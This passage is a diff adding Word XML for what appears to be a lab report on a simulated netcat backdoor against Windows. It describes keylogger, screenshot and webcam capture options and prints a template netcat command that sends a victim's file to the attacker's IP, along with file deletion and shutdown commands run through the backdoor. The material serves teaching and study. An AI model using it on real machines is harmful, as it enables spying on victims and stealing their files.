+                                    <a:xfrm>
+                                      <a:off x="0" y="0"/>
+                                      <a:ext cx="5936615" cy="3118485"/>
+                                    </a:xfrm>
+                                    <a:prstGeom prst="rect">
+                                      <a:avLst/>
+                                    </a:prstGeom>
+                                    <a:noFill/>
+                                    <a:ln>
+                                      <a:noFill/>
+                                    </a:ln>
+                                  </pic:spPr>
+                                </pic:pic>
+                              </a:graphicData>
+                            </a:graphic>
+                          </wp:inline>
+                        </w:drawing>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>8</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">. </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>Sending files</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:anchorlock/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figure 8 shows how the attacker can obtain files from the remote host. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The netcat server comes packaged with an executable application that executes commands </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>using</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the connection between the victim and the attacker’s machines using protocols in the TCP/IP protocol suite such as FTP and TCP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to send files</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">application accepts commands such as </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve">-s </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">to take and send a screenshot of the victim’s machine. The </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>-k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> command would prepare the log file created by the key logger for sending while the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve">-m </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>command would take a snapshot using the camera built-in in the victim’s machine and prepare it for sending.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>The command structure goes as follows:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
-          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Send </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>-s | -m | -k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>] [local I.P. Address]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The command above also requires that you specify your own machine’s I.P. address as this will tell the server where to send the file. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">If the I.P. address is not specified, the command will </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>fail,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and the file will not be sent. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">It is also quite important to take note that the whole process would require a functional internet connection </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">and the I.P. address of the remote machine </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> work.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In conjunction with this, the above-mentioned command executes the following the netcat command against the connection: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>3.1 Algorithms used</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
+        </w:rPr>
+        <w:t xml:space="preserve">-v -w </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>time out</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>3.2 Screen Shots</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>local IP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1997 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>file name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>].[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>file extension</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>where:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">nc </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">is a reference to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>netcat</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">-v </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">indicates that the command should return </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>feedback</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to the caller regarding the status of the execution</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">-w </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>time out</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] specifies the amount of time in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>seconds</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> that the sender should wait for a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">receiver to pickup the request </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:i/>
+        </w:rPr>
+        <w:t>local IP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">] </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>specifies the I.P. address of the receiver</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>1997</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> specifies the port number the receiver is listening for connections in</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>&lt; [</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:i/>
+        </w:rPr>
+        <w:t>file name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>].[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:i/>
+        </w:rPr>
+        <w:t>file extension</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">] </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>specifies that the file of a specific name and type should be sent to the given address.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>In Importance to O.S.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This experiment demonstrates the most commonly stated reason as to why Microsoft’s Windows operating system is a target for attackers. This fact is not only because it is the operating system shipped with almost all machines. But, it is also because the system treats all its users as administrators in certain scenarios. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This is evident in the entire simulation given that the attacker was able to communicate with the instance of the server running on the machine through the backdoor command line which is also able to execute other commands such as </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t>del /</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve">f </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>which</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> forcefully deletes a file and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+        </w:rPr>
+        <w:t xml:space="preserve">shutdown /s </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>which calls for an immediate shutdown of the machine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
